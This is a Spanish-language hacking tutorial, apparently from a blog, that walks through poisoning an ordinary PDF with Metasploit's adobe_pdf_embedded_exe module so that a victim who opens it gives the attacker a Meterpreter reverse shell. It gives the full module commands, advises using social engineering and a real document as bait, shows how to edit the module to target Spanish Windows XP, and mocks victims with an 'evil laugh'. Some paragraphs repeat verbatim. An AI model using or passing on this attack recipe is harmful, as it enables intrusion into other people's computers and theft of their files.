Envenenamiento de PDF (Infectando PDF) - Obtención de shell inversa
Hoy les acerco un tutorial bastante interesante para los novatos (como su humilde servidor). Se trata de un step by step (paso a paso) sobre como envenenar un PDF para obtener una shell inversa en nuestro sistema víctima.
Para lograrlo, utilizaremos cualquier distro con metasploit instalado
Aqui vamos...
Para encontrar unas de las amenazas mas frecuentes en una empresa, debemos
pensar en las vulnerabilidades a las que se pueden enfrentar los
empleados, si el software de nuestra empresa no esta correctamente
actualizado, general mente las empresas solo actualizan los parches
de seguridad de los sistemas operativos y no tienen, encuenta que el
sistema operativo tienen mucho mas software que necesita ser actualizado, con sus respectivas actualizaciones de seguridad. hoy les mostrare como con un poco de ingeniería social podremos obtener una shell reversa o un vnc. utilizando como herramienta nuestro querido Metasploit, utilizando el exploit “adobe_pdf_empedded_exe”
con lo cual envenenaremos un pdf tan comun en las empresas como en
nuestros hogares anteriormente era mucho mas seguro el pdf que un
archivo de word pero hoy en dia es todo lo contrario lo mas inseguro que
existe es pdf.
Lo bueno de el modulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, algo útil es buscar un pdf en google
Otra aspecto a tener en cuenta, es que este modulo tiene rank de Execellent, por lo que es excelente opción, ante los demás exploits client side attacks que son menos estables.
Después de tener un pdf lo que debemos realizar es abrir metasploit y haremos lo siguiente:
luego dejamos escuchando por la conexiòn reversa que se va a generar una vez que la victima abra el pdf:
Luego cuando la víctima abra el PDF, le aparecerá lo siguiente:
Bujuajajajajajaja (risa malvada) XD
Otra aspecto a tener en cuenta, es que este modulo tiene rank de Execellent, por lo que es excelente opción, ante los demás exploits client side attacks que son menos estables.
Después de tener un pdf lo que debemos realizar es abrir metasploit y haremos lo siguiente:
use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/nuestropdf.pdf
set FILENAME nuevonombre.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST nuestraip
exploit
en la primera opción INFILENAME colocamos la ruta de
nuestro pdf a utilizar, y en la opciòn FILENAME colocamos el nombre al
pdf resultante, en LHOST colocamos nuestra IPluego dejamos escuchando por la conexiòn reversa que se va a generar una vez que la victima abra el pdf:
Luego cuando la víctima abra el PDF, le aparecerá lo siguiente:
Bujuajajajajajaja (risa malvada) XD
Bueno,
al momento de presionar “OPEN” el payload serà dropeado en el sistema, y
un script intentara abrirlo. como el exploit esta realizado para
windows xp SP3 English (Ingles), lo que haremos entonces es modificar
el warning que el payload es buscado dentro de “Desktop”
(Escritorio),”My Documents” (Mis documentos) .
Para que funcione con xp en español, debemos modificar el código del mòdulo, los directorios ” Escritorio” y “Mis Documentos”, y realizamos de nuevo todo el procedimiento sobre el pdf:
esta es la ruta en backtrack
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
y modificamos las siguiente linea.
dirs = [ "Desktop", "My Documents", "Documents" ]
por
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
Si se ejecutará el playload, obtendremos un Meterpreter
y como podemos ver obtenemos una shell inversa con Meterpreter!
Todo
hermoso, muy lindo, pero más de uno se preguntara...¿Y que es una shell
inversa? ¿Para que me sirve? Paciencia amigo, segui leyendo...
Basicamente
una shell inversa es lograr que, tras ejecutar un "soft" (por llamarlo
de algún modo) en la pc remota, esta intente conectarse con nosotros
otorgandonos el tan preciado teroso...una shell.
De
este modo, podrás manejar o controla la pc como si estuviera delante
tuyo, teniendo en tus manos el PODER de alcanzar cualqueir archivo,
documento, etc
Todo muy didáctico y hermoso hermano...pero no se que es una shell
Bueno...viendo que no estás con muchas ganas de acudir a Google, voy a hacerlo por vos
Según Wiki...una shell es:
...es
el término usado en informática para referirse a un intérprete de
comandos, el cual consiste en la interfaz de usuario tradicional de los
sistemas operativos basados en Unix y similares como GNU/Linux.
Ya
estas poniendo cara de malvado...tranquilo...hacé tus practicas en una
maquina virtual. Si no sabés como instalar una...buscá en el foro, hay
muchos tutoriales.
Envenenamiento de PDF (Infectando PDF) - Obtención de shell inversa
Reviewed by Zion3R
on
14:18
Rating: